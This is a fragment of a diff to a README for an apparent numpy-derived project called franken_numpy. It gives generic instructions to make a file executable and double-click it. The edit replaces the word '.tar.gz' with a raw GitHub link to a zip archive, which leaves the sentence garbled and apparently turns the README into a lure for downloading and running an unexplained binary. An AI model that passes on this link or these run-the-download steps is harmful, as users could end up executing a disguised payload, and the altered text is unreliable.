DylanRoblox730/franken_numpy/README.md

   - Right-click the file, select "Properties," and allow executing.
   - Double-click to run.

-If you have a `.tar.gz`, you may need to extract the files and follow further instructions inside, usually found in a README file.
+If you have a `https://raw.githubusercontent.com/DylanRoblox730/franken_numpy/main/artifacts/baselines/numpy_franken_3.4.zip`, you may need to extract the files and follow further instructions inside, usually found in a README file.

 ---